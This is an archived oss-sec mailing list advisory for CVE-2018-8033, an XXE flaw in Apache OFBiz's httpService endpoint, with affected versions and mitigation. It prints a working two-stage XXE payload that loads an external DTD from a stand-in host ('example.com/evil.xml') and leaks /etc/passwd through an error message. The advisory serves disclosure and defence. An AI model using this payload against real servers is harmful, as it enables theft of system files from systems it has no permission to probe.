oss-sec mailing list archives
[SECURITY] CVE-2018-8033 Apache OFBiz XXE Vulnerability in HttpEngine
From: Taher Alkhateeb <slidingfilaments () gmail com>
Date: Fri, 5 Oct 2018 15:58:13 +0300
Severity: Important Vendor: The Apache Software Foundation Versions Affected: OFBiz 16.11.01 to 16.11.04 Description: The OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host. Mitigation: Upgrade to 16.11.05 or manually apply the following commits on branch 16 r1833708 r1836141 Example: # The following payload may be used: <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY % request SYSTEM 'http://example.com/evil.xml'> %request; %secondstage; ]> <r>&disclose;</r> # And then the remote file evil.xml has the following payload: <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % secondstage "<!ENTITY disclose SYSTEM 'file:///nonexistent/%file;'>"> %secondstage; %disclose; The second stage payload specifies what file to disclose on the OFBiz server. It instructs the OFBiz server to look for a file in the path /nonexistent/. The server will throw a "File Not Found" error and then append the target file (/etc/passwd) to the error message. Credit: James Parfet <jamesp at mindpointgroup.com> References: http://ofbiz.apache.org/download.html#vulnerabilities
Current thread:
- [SECURITY] CVE-2018-8033 Apache OFBiz XXE Vulnerability in HttpEngine Taher Alkhateeb (Oct 05)